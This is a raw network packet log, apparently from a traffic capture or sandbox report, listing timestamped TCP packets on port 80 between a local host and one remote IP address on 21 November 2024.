                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.349425077 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.349468946 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.350404978 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.350565910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.350614071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.351489067 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.351536036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.351560116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.351594925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.352598906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.352725029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.352772951 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.353646994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.353693008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.353770018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.353817940 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.354752064 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.354801893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.354840994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.354890108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.355850935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.355897903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.355947971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.355990887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.356897116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.356978893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.357028961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.357992887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.358046055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.358091116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.358136892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.359224081 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.359270096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.359282970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.359319925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.360167027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.360215902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.360337019 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.360383034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.361270905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.361411095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.361459970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.362338066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.362386942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.362437963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.362484932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.363497019 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.363571882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.363584995 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.363619089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.364521980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.364572048 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.364624023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.364669085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.365720987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.365840912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.365890980 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.366712093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.366756916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.366781950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.366827011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.367806911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.367907047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.367954016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.368865013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.368916988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.369081974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.369127989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.369966030 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.370022058 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.370059013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.370102882 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.371085882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.371102095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.371148109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.372164011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.372210026 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.372275114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.372320890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.373230934 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.373275995 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.373321056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.373366117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.374360085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.374430895 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.374439955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.374486923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.375377893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.375426054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.528721094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.528841019 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.528901100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.529231071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.529280901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.529362917 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.529408932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.530369997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.530421972 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.530466080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.530509949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.531470060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.531517982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.531568050 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.532495022 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.532541990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.532582045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.532624960 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.533585072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.533695936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.533745050 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.534696102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.534802914 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.534833908 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.534857035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.535780907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.535881996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.535931110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.536860943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.536912918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.537614107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.537672997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.538018942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.538064957 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.538146019 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.538189888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.539051056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.539169073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.539222956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.540126085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.540175915 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.540256977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.540304899 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.541270971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.541321039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.541363001 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.541410923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.542299986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.542351007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.542409897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.542457104 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.543395042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.543454885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.543498039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.543548107 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.544485092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.544542074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.544584990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.544632912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.545588017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.545697927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.545749903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.546693087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.546824932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.546843052 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.546936989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.547759056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.547889948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.547945023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.548892021 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.548950911 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.548959970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.549006939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.549947023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.550030947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.550041914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.550128937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.551028967 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.551192045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.551245928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.552117109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.552177906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.552192926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.552238941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.553221941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.553278923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.553294897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.553337097 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.554277897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.554332018 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.554374933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.554419994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.555373907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.555427074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.555463076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.555505991 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.556447029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.556503057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.556504965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.556548119 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.557549953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.557725906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.557816029 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.558645964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.558729887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.558756113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.558820963 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.559732914 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.559782982 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.559843063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.559891939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.560863018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.560909986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.560955048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.561001062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.561937094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.561988115 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.562062025 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.562107086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.563038111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.563142061 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.563194036 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.564093113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.564141989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.564203024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.564249039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.565220118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.565278053 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.565332890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.565377951 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.566301107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.566356897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.566421986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.566468000 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.567410946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.567468882 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.567604065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.567650080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.568500996 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.568550110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.568598986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.568644047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.569565058 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.569698095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.569747925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.570631027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.570686102 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.570729017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.570775032 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.571722984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.571774006 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.571872950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.571918964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.572829008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.572884083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.572987080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.573031902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.574001074 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.574054956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.574105978 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.574153900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.575124979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.575201988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.575258017 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.576198101 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.576252937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.576313019 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.576359034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:17.577176094 CET804977031.41.244.11192.168.2.4
